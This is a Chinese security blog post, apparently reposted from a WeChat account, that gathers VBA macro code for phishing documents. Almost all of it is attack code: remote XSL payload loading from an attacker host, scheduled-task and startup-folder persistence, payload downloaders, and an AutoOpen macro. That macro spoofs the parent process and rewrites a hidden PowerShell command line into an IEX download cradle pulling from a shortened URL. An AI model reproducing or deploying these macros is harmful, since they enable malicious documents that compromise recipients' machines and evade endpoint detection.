钓鱼文档碎碎念(五)

  • A+
所属分类:安全闲碎


本文为总结文,总结常用的宏代码,希望能帮到用得到人。


wmi启动进程


Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\.rootcimv2")Set objStartup = objWMIService.Get("Win32_ProcessStartup")Set objConfig = objStartup.SpawnInstance_Set objProcess = GetObject("winmgmts:rootcimv2:Win32_Process")errReturn = objProcess.Create("Notepad.exe", Null, objConfig, intProcessID)


com启动进程


Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")obj.Document.Application.ShellExecute "calc",Null,"C:\Windows\System32",Null,0


加载远程xsl文件


Set xml = CreateObject("Microsoft.XMLDOM")xml.async = FalseSet xsl = xmlxsl.load(“http://attacker/payload.xsl”)xml.transformNode xsl


注:该方法上线在目标关闭后会失去session,msf可以设置自动迁移进程的参数,如果是cobaltstrike可以使用插件实现,若不清楚如何实现,可后台留言,回头更新。


计划任务


Set service = CreateObject("Schedule.Service")Call service.ConnectDim td: Set td = service.NewTask(0)td.RegistrationInfo.Author = "Microsoft Corporation"td.settings.StartWhenAvailable = Truetd.settings.Hidden = FalseDim triggers: Set triggers = td.triggersDim trigger: Set trigger = triggers.Create(1)Dim startTime: ts = DateAdd("s", 30, Now)startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2)trigger.StartBoundary = startTimetrigger.ID = "TimeTriggerId"Dim Action: Set Action = td.Actions.Create(0)Action.Path = "C:WindowsSystem32notepad.exe"Call service.GetFolder("").RegisterTaskDefinition("UpdateTask", td, 6, , , 3)



文件落地


Path = CreateObject("WScript.Shell").SpecialFolders("Startup")Set objFSO = CreateObject("Scripting.FileSystemObject")Set objFile = objFSO.CreateTextFile(Path & "test.bat", True)objFile.Write "notepad.exe" & vbCrLfobjFile.Close



文件下载


Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")xHttp.Open "GET", "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe", FalsexHttp.SendWith bStrm    .Type = 1    .Open    .write xHttp.responseBody    .savetofile Environ("APPDATA") & "test.exe", 2End With


Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As Long, _ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, _ByVal lpfnCB As Long) As Longx = URLDownloadToFileA(0, "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe", Environ("APPDATA") & "test.exe", 0, 0)


Set ie = CreateObject("InternetExplorer.Application")ie.Navigate "https://pastebin.com/raw/tcmMXwMG"State = 0Do Until State = 4DoEventsState = ie.readyStateLoopDim payload: payload = ie.Document.Body.innerHTML


父进程欺骗


' Windows API constants
Const EXTENDED_STARTUPINFO_PRESENT = &H80000Const HEAP_ZERO_MEMORY = &H8&Const SW_HIDE = &H0&Const PROCESS_ALL_ACCESS = &H1F0FFFConst PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = &H20000Const TH32CS_SNAPPROCESS = &H2&Const MAX_PATH = 260

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Data types '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Private Type LARGE_INTEGER lowpart As Long highpart As LongEnd Type
Private Type UNICODE_STRING64 Length As Integer MaxLength As Integer lPad As Long lpBuffer As LongPtrEnd Type
Private Type RTL_USER_PROCESS_PARAMETERS Reserved1(15) As Byte Reserved2(9) As Long CurrentDirectoryPath As UNICODE_STRING64 CurrentDirectoryHandle As LongPtr DllPath As UNICODE_STRING64 ImagePathName As UNICODE_STRING64 CommandLine As UNICODE_STRING64 Environment As LongPtrEnd Type
Private Type PROCESS_BASIC_INFORMATION ExitStatus As Long Reserved0 As Long PebBaseAddress As LongPtr AffinityMask As LARGE_INTEGER BasePriority As Long Reserved1 As Long uUniqueProcessId As LARGE_INTEGER uInheritedFromUniqueProcessId As LARGE_INTEGEREnd Type
Private Type PEB Reserved1(1) As Byte BeingDebugged As Byte Reserved2(20) As Byte Ldr As Long ProcessParameters As LongPtr Reserved3(519) As Byte PostProcessInitRoutine As Long Reserved4(135) As Byte SessionId As LongEnd Type
Private Declare PtrSafe Function NtQueryInformationProcess Lib "ntdll" ( _ ByVal hProcess As LongPtr, _ ByVal ProcessInformationClass As Long, _ ByRef pProcessInformation As Any, _ ByVal uProcessInformationLength As Long, _ ByRef puReturnLength As LongPtr) As Long Private Declare PtrSafe Function NtReadVirtualMemory Lib "ntdll" ( _ ByVal hProcess As LongPtr, _ ByVal BaseAddress As LongPtr, _ ByRef Buffer As Any, _ ByVal BufferBytesToRead As Long, _ ByRef ReturnLength As LARGE_INTEGER) As Long
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "ntdll" ( _ ByVal hProcess As LongPtr, _ ByVal VABA As Any, _ ByVal lpBuffer As Any, _ ByVal nSS As Long, _ ByRef NOBW As LARGE_INTEGER) As Boolean
Private Type PROCESS_INFORMATION hProcess As LongPtr hThread As LongPtr dwProcessId As Long dwThreadId As LongEnd Type
Private Type STARTUP_INFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As LongPtr hStdInput As LongPtr hStdOutput As LongPtr hStdError As LongPtrEnd Type Private Type STARTUPINFOEX STARTUPINFO As STARTUP_INFO lpAttributelist As LongPtrEnd Type
' From https://foren.activevb.de/archiv/vb-net/thread-76040/beitrag-76164/ReadProcessMemory-fuer-GetComma/
Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szexeFile As String * MAX_PATHEnd Type
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' kernel32 & ntdll bindings ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Private Declare PtrSafe Function CreateProcess Lib "kernel32.dll" Alias "CreateProcessA" ( _ ByVal lpApplicationName As String, _ ByVal lpCommandLine As String, _ lpProcessAttributes As Long, _ lpThreadAttributes As Long, _ ByVal bInheritHandles As Long, _ ByVal dwCreationFlags As Long, _ lpEnvironment As Any, _ ByVal lpCurrentDriectory As String, _ ByVal lpStartupInfo As LongPtr, _ lpProcessInformation As PROCESS_INFORMATION _) As Long
Private Declare PtrSafe Function OpenProcess Lib "kernel32.dll" ( _ ByVal dwAccess As Long, _ ByVal fInherit As Long, _ ByVal hObject As Long _) As LongPtr Private Declare PtrSafe Function HeapAlloc Lib "kernel32.dll" ( _ ByVal hHeap As LongPtr, _ ByVal dwFlags As Long, _ ByVal dwBytes As LongPtr _) As LongPtr
Private Declare PtrSafe Function GetProcessHeap Lib "kernel32.dll" () As LongPtr
Private Declare PtrSafe Function InitializeProcThreadAttributeList Lib "kernel32.dll" ( _ ByVal lpAttributelist As LongPtr, _ ByVal dwAttributeCount As Integer, _ ByVal dwFlags As Integer, _ ByRef lpSize As Long _) As Boolean
Private Declare PtrSafe Function UpdateProcThreadAttribute Lib "kernel32.dll" ( _ ByVal lpAttributelist As LongPtr, _ ByVal dwFlags As Integer, _ ByVal lpAttribute As Long, _ ByRef lpValue As LongPtr, _ ByVal cbSize As Integer, _ ByRef lpPreviousValue As Integer, _ ByRef lpReturnSize As Integer _) As Boolean
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32.dll" ( _ ByVal dwFlags As Integer, _ ByVal th32ProcessID As Integer _) As Long Private Declare PtrSafe Function Process32First Lib "kernel32.dll" ( _ ByVal hSnapshot As LongPtr, _ ByRef lppe As PROCESSENTRY32 _) As Boolean Private Declare PtrSafe Function Process32Next Lib "kernel32.dll" ( _ ByVal hSnapshot As LongPtr, _ ByRef lppe As PROCESSENTRY32 _) As Boolean

Private Declare PtrSafe Function ResumeThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Long

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Utility functions '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Finds the PID of a process given its namePublic Function getPidByName(ByVal name As String) As Integer Dim pEntry As PROCESSENTRY32 Dim continueSearching As Boolean pEntry.dwSize = LenB(pEntry) Dim snapshot As LongPtr
snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, ByVal 0&) continueSearching = Process32First(snapshot, pEntry) Do If InStr(1, pEntry.szexeFile, name) Then getPidByName = pEntry.th32ProcessID continueSearching = False Else continueSearching = Process32Next(snapshot, pEntry) End If Loop While continueSearching
End Function
Public Function convertStr(ByVal str As String) As Byte() Dim i, j As Integer Dim result(400) As Byte j = 0 For i = 1 To Len(str): result(j) = Asc(Mid(str, i, 1)) result(j + 1) = &H0 j = j + 2 Next convertStr = result End Function


Sub AutoOpen()
Dim pi As PROCESS_INFORMATION Dim si As STARTUPINFOEX Dim nullStr As String Dim pid, result As Integer Dim threadAttribSize As Long Dim parentHandle As LongPtr Dim originalCli As String originalCli = "powershell.exe -NoExit -c Get-Service -DisplayName '*network*' | Where-Object { $_.Status -eq 'Running' } | Sort-Object DisplayName" ' Get a handle on the process to be used as a parent pid = getPidByName("explorer.exe") parentHandle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
' Initialize process attribute list result = InitializeProcThreadAttributeList(ByVal 0&, 1, 0, threadAttribSize) blah = Err.LastDllError si.lpAttributelist = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, threadAttribSize) blah = Err.LastDllError result = InitializeProcThreadAttributeList(si.lpAttributelist, 1, 0, threadAttribSize)
' Set the parent to be our previous handle result = UpdateProcThreadAttribute(si.lpAttributelist, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, parentHandle, Len(parentHandle), ByVal 0&, ByVal 0&)
' Set the size of cb (see https://docs.microsoft.com/en-us/windows/desktop/api/winbase/ns-winbase-_startupinfoexa#remarks) si.STARTUPINFO.cb = LenB(si) ' Hide new process window si.STARTUPINFO.dwFlags = 1 si.STARTUPINFO.wShowWindow = SW_HIDE
result = CreateProcess( _ nullStr, _ originalCli, _ ByVal 0&, _ ByVal 0&, _ 1&, _ &H80014, _ ByVal 0&, _ nullStr, _ VarPtr(si), _ pi _ )
' Spoofing of cli arguments Dim size As LongPtr Dim PEB As PEB Dim pbi As PROCESS_BASIC_INFORMATION Dim newProcessHandle As LongPtr Dim success As Boolean Dim parameters As RTL_USER_PROCESS_PARAMETERS Dim cmdStr As String Dim cmd() As Byte Dim liRet As LARGE_INTEGER newProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, pi.dwProcessId)
result = NtQueryInformationProcess(newProcessHandle, 0, pbi, Len(pbi), size) success = NtReadVirtualMemory(newProcessHandle, pbi.PebBaseAddress, PEB, Len(PEB), liRet)
' peb.ProcessParameters now contains the address to the parameters - read them success = NtReadVirtualMemory(newProcessHandle, PEB.ProcessParameters, parameters, Len(parameters), liRet) blah = Err.LastDllError cmdStr = "powershell.exe -noexit -ep bypass -c IEX((New-Object System.Net.WebClient).DownloadString('http://bit.ly/2TxpA4h')) #" cmd = convertStr(cmdStr) success = NtWriteVirtualMemory(newProcessHandle, parameters.CommandLine.lpBuffer, StrPtr(cmd), 2 * Len(cmdStr), liRet) ResumeThread (pi.hThread) End Sub



写在后面


与flash钓鱼一样,宏钓鱼终将被时代所淘汰,希望这几篇文章能给各位师傅们提供一些思路,让其在最后的时间里,再放光芒




参考文章:


https://blog.f-secure.com/dechaining-macros-and-evading-edr/

https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba

https://blog.f-secure.com/detecting-parent-pid-spoofing/



     ▼
更多精彩推荐,请关注我们

钓鱼文档碎碎念(五)



本文始发于微信公众号(鸿鹄实验室):钓鱼文档碎碎念(五)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: